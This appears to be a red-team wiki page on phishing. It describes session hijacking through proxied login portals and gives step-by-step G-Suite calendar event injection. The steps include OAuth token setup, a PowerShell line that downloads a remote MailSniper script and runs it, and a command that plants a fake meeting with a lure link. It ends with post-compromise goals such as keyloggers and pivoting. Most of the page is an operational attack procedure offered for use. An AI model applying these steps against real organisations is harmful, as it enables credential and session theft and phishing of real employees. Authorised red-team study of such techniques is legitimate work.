Phising
Misconfigurations and vulnerable software are not the only way into a targets network. Phishing can be a very valuable wrench in your toolkit, its perfect to gather credentials, sessions or even shells.
Session Hijack
Steal creds and/or session cookies. Can be useful when client has good prevention against shells.
Email a link to a target employee pointing to a cloned/proxied auth portal (Microsoft Online(O365, Azure), G-suite. AWS Console). When they auth they get a real session cookies, and so do we.
Tools: Evilginx2, Modlishka # MOVE TO OWN TOOL PAGE
When we get session we need to act fast and setup persistence.
G-suite
G-Suite allowed for Calendar Event Injection. This allows a attacker to silently (without the need for a e-mail by using the API) inject a calendar entry to the users calender. This bypasses the “Don’t auto-add” options. Doing something like this will create urgency with a reminder notification.
Manual
This can be prevented by setting ‘Event settings -> Automatically add invitations’ to ‘No, only show invitations to which I have responded.’
- Create a new gmail account with a convincing name
- Prepair your payload of choice and make it available externally (for example with pwndrop)
- Open
https://calendar.google.com/calendar/while logged into your new account. - Create a new calendar event, make sure to set a reminder.
- Ensure you click do not send.
- The user will recieve a notification when the ‘meeting’ is supposed to happen.
API
- logon into the account you want to inject as
- open
https://console.developers.google.com/flows/enableapi?apiid=calendar&pli=1 - Select Project and agree the ToS
- On the “Add credentials to your project” page click cancel.
- At the top of the page, select the “OAuth consent screen” tab. Select an Email address, enter a Product name if not already set, and click the Save button.
- Select the Credentials tab, click the Create credentials button and select OAuth client ID.
- Select the application type Web application, under “Authorized redirect URIs” paste in the following address:
https://developers.google.com/oauthplayground. Then, click the Create button.
- Copy your “Client ID” and “Client Secret”.
- Navigate here:
https://developers.google.com/oauthplayground/. - Click the “gear icon” in the upper right corner and check the box to “Use your own OAuth credentials”. Enter the OAuth2 client ID and OAuth2 client secret in the boxes.
- Make sure that “OAuth flow” is set to Server-side, and “Access Type” is set to offline.
- Select the “Calendar API v3” dropdown and click both URLs to add them to scope. Click Authorize APIs.
- Select the account you want to authorize, then click Allow.
(If there is an error such as “Error: redirect_uri_mismatch” then it’s possible the changes haven’t propagated yet. Just wait a few minutes, hit the back button and try to authorize again.).
- You should now be at “Step 2: Exchange authorization code for tokens.” Click the “Exchange authorization code for tokens button”. The “Access token” is the item we need for accessing the API. Copy the value of the “Access token”.
P.S. The “Access token” expires after 3600 seconds.
PS C:\Users\justin-p> iex((iwr https://raw.githubusercontent.com/dafthack/MailSniper/master/MailSniper.ps1).content)
PS C:\Users\justin-p> Invoke-InjectGEventAPI -PrimaryEmail Injector@gmail.com -AccessToken 'TOKEN' -Targets "InjectToMe@gmail.com" -StartDateTime 2020-09-02T15:20:00 -EndDateTime 2020-09-02T15:30:00 -EventTitle "Company Meeting" -EventDescription "Please review the agenda at the URL below prior to the meeting. https://ElRandoUrl" -EventLocation "Zoom app goes Bzzzzzzzz"
Remote Access
Try to comprise workstations. This would (depending on the user) give access to internal and other cloud resources. Allows us to steal tokens from disk, preform session hijack/riding, start keyloggers and pivot in the network from this entry point.
Related pages
| Name | Description |
|---|